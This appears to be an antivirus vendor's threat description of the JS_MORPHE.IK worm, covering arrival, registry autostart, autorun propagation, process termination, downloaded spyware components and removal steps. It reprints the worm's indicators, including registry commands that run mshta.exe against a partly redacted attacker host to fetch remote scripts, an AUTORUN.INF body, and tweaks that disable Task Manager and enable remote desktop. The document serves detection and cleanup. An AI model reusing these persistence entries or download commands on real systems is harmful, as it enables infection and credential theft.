JS_MORPHE.IK
Windows 2000, Windows XP, Windows Server 2003
Threat Type: Worm
Destructiveness: No
Encrypted: No
In the wild: Yes
OVERVIEW
This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It may be hosted on a website and run when a user accesses the said website.
It adds certain registry entries to disable the Task Manager. This action prevents users from terminating the malware process, which can usually be done via the Task Manager.
It drops an AUTORUN.INF file to automatically execute the copies it drops when a user accesses the drives of an affected system.
TECHNICAL DETAILS
Arrival Details
This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
It may be hosted on a website and run when a user accesses the said website.
Installation
This worm drops and executes the following files:
- %Desktop%\msn\d.tpl - same detection name
- %Desktop%\msn\d.reg - detected as REG_MORPHE.A
(Note: %Desktop% is the current user's desktop, which is usually C:\Windows\Profiles\{user name}\Desktop on Windows 98 and ME, C:\WINNT\Profiles\{user name}\Desktop on Windows NT, and C:\Documents and Settings\{User Name}\Desktop on Windows 2000, XP, and Server 2003.)
Autostart Technique
This worm adds the following registry entries to enable its automatic execution at every system startup:
HKEY_CLASSES_ROOT\WinRAR\shell\
open\command
{default} = ""%System%\mshta.exe\" "http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/nfiles/exec.php?t={current date and time};p=WinRar;f=%1\""
HKEY_CLASSES_ROOT\Directory\shell\
DOSAqui
{default} = "Abrir Carpeta"
HKEY_CLASSES_ROOT\Directory\shell\
DOSAqui\Command
{default} = "mshta.exe http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/msnmsgr.tpl"
HKEY_CLASSES_ROOT\Drive\shell\
DOSAqui
{default} = "Abrir Unidad de Disco"
HKEY_CLASSES_ROOT\Drive\shell\
DOSAqui\Command
{default} = "mshta.exe http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/msnmsgr.tpl"
Other System Modifications
This worm adds the following registry entries as part of its installation routine:
HKEY_CURRENT_USER\Software\Microsoft\
Internet Explorer\Main
Start Page = "http://mail-live.no-ip.info"
HKEY_CURRENT_USER\Software\Microsoft\
Internet Explorer\Main
Window Title = "::M0rPheU$:: v2.1"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Control\Terminal Server
fDenyTSConnections = "0"
It adds the following registry entries to disable the Task Manager:
HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Policies\
System
DisableTaskMgr = "1"
Propagation
This worm drops an AUTORUN.INF file to automatically execute the copies it drops when a user accesses the drives of an affected system.
The said .INF file contains the following strings:
[autorun]
open=\"inf.exe\"
icon=\"%SystemRoot%\system32\SHELL32.dll,8\"
action=Abrir carpeta para ver archivos
shell\open=Abrir carpeta para ver archivos
shell\open\command=\"inf.exe\"
shell\open\default=^1
Process Termination
This worm terminates the following processes if found running in the affected system's memory:
- avgnt.exe
- avguard.exe
- avshadow.exe
- chrome.exe
- firefox.exe
- GoogleUpdate.exe
- msnmsgr.exe
- GoogleCrashHandler.exe
- mailpv.exe
Dropping Routine
This worm drops the following files:
- %User Profile%\Datos de programa\Microsoft\Internet Explorer\Quick Launch\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
- %Desktop%\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
- %System Root%\Documents and Settings\All Users\Desktop\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
- %System Root%\Documents and Settings\All Users\Start Menu\Programs\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
- %System Root%\Documents and Settings\All Users\Start Menu\Programs\Startup\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
- %System Root%\Documents and Settings\All Users\Start Menu\Programs\Startup\Actualizaciones de Windows Live.lnk - detected as LNK_MORPHE.III
- %System Root%\Documents and Settings\All Users\Start Menu\Programs\Startup\Detector de Spywares de Windows Live.lnk - detected as LNK_MORPHE.III
- %User Startup%\Actualizaciones de Windows Live.lnk - detected as LNK_MORPHE.III
- %User Startup%\Detector de Spywares de Windows Live.lnk - detected as LNK_MORPHE.III
- %StartMenu%\Programs\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
- %StartMenu%\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
- %%User Profile%\Recent\Windows Live Messenger.lnk - detected as LNK_MORPHE.III
(Note: %User Profile% is the current user's profile folder, which is usually C:\Windows\Profiles\{user name} on Windows 98 and ME, C:\WINNT\Profiles\{user name} on Windows NT, and C:\Documents and Settings\{user name} on Windows 2000, XP, and Server 2003.. %Desktop% is the current user's desktop, which is usually C:\Windows\Profiles\{user name}\Desktop on Windows 98 and ME, C:\WINNT\Profiles\{user name}\Desktop on Windows NT, and C:\Documents and Settings\{User Name}\Desktop on Windows 2000, XP, and Server 2003.. %System Root% is the root folder, which is usually C:\. It is also where the operating system is located.. %User Startup% is the current user's Startup folder, which is usually C:\Windows\Profiles\{user name}\Start Menu\Programs\Startup on Windows 98 and ME, C:\WINNT\Profiles\{user name}\Start Menu\Programs\Startup on Windows NT, and C:\Documents and Settings\{User name}\Start Menu\Programs\Startup.)
Download Routine
This worm connects to the following website(s) to download and execute a malicious file:
- http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/msn/msn.js
NOTES:
This worm drops the following files in all physical and removable drives found in the affected system:
- inf.exe - detected as TSPY_SPYEKS.C
- Windows Live Messenger.lnk - detected as LNK_MORPHE.III
It searches for subfolders in the following folders then drops a shortcut link as {folder name}.lnk:
- {drive letter}
- %Desktop%
- %User Profile%\My Documents
- %Start Menu%
- %Start Menu%\Programs
- %Start Menu%\Programas
It modifies the attributes of folders found into Hidden to trick the users that the folders have been deleted. The dropped shortcut links are detected as LNK_MORPHE.III.
It creates a duplicate copy of the following files with a different file name:
- %Desktop%\msn\m2011.tt copied as %Desktop%\msn\m2011.exe
- %Desktop%\msn\mailpv.tt copied as %Desktop%\msn\mailpv.exe
It then executes the copied files. As a result, malicious routines of the copied files are exhibited on the affected system.
This worm connects to the following URLs to download its components and renames them before storing in the affected system:
- http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/nfiles/key.tt - saved as %Desktop%\msn\inf.tt - detected as TSPY_SPYEKS.C
- http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/nfiles/mailer.js - saved as %Desktop%\msn\mailer.tpl - detected as JS_MAILER.AC
- http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/nfiles/mailpv.js - saved as %Desktop%\msn\mailpv.tt - detected as HKTL_MAILPASSVIE
- http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/nfiles/key.tt - saved as %Desktop%\msn\m2011.tt - detected as TSPY_SPYEKS.C
- http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/morph.jpg - saved as %Desktop%\msn\M0rPheU$_Esta_Aqui.jpg
- http://{BLOCKED}.146.149:102/m0rpheus/mor{BLOCKED}010/nfiles/MA.tt - saved as %Desktop%\msn\Mejores Amigos.zip - detected as LNK_MORPHEUS.VTG
It sends a ping command to the following IP addresses:
- {BLOCKED}.{BLOCKED}.179.157
- {BLOCKED}.{BLOCKED}.221.201
It changes the attribute of the folder %Desktop%\msn to Hidden.
SOLUTION
Step 1
For Windows XP and Windows Server 2003 users, before doing any scans, please make sure you disable System Restore to allow full scanning of your computer.
Step 2
Close all opened browser windows
Step 3
Remove malware files dropped/downloaded by JS_MORPHE.IK
- REG_SCRDL.A
- TSPY_SPYEKS.C
- LNK_MORPHE.III
- JS_MAILER.AC
- HKTL_MAILPASSVIE
- LNK_MORPHEUS.VTG
Step 4
Restart in Safe Mode
Step 5
Delete this registry value
Important: Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this step only if you know how or you can ask assistance from your system administrator. Else, check this Microsoft article first before modifying your computer's registry.
- In HKEY_CLASSES_ROOT\WinRAR\shell\open\command
- {default} = ""%System%\mshta.exe\" "http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/nfiles/exec.php?t={current date and time};p=WinRar;f=%1\""
- {default} = ""%System%\mshta.exe\" "http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/nfiles/exec.php?t={current date and time};p=WinRar;f=%1\""
- In HKEY_CLASSES_ROOT\Directory\shell\DOSAqui
- {default} = "Abrir Carpeta"
- {default} = "Abrir Carpeta"
- In HKEY_CLASSES_ROOT\Directory\shell\DOSAqui\Command
- {default} = "mshta.exe http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/msnmsgr.tpl"
- {default} = "mshta.exe http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/msnmsgr.tpl"
- In HKEY_CLASSES_ROOT\Drive\shell\DOSAqui
- {default} = "Abrir Unidad de Disco"
- {default} = "Abrir Unidad de Disco"
- In HKEY_CLASSES_ROOT\Drive\shell\DOSAqui\Command
- {default} = "mshta.exe http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/msnmsgr.tpl"
- {default} = "mshta.exe http://{BLOCKED}.146.149:102/m0rpheus/morpheus2010/msnmsgr.tpl"
- In HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
- Start Page = "http://mail-live.no-ip.info"
- Start Page = "http://mail-live.no-ip.info"
- In HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
- Window Title = "::M0rPheU$:: v2.1"
- Window Title = "::M0rPheU$:: v2.1"
- In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
- fDenyTSConnections = "0"
- fDenyTSConnections = "0"
- In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
- DisableTaskMgr = "1"
- DisableTaskMgr = "1"
Step 6
Search and delete AUTORUN.INF files created by JS_MORPHE.IK that contain these strings
Step 7
Restart in normal mode and scan your computer with your Trend Micro product for files detected as JS_MORPHE.IK. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check this Knowledge Base page for more information.
Did this description help? Tell us how we did.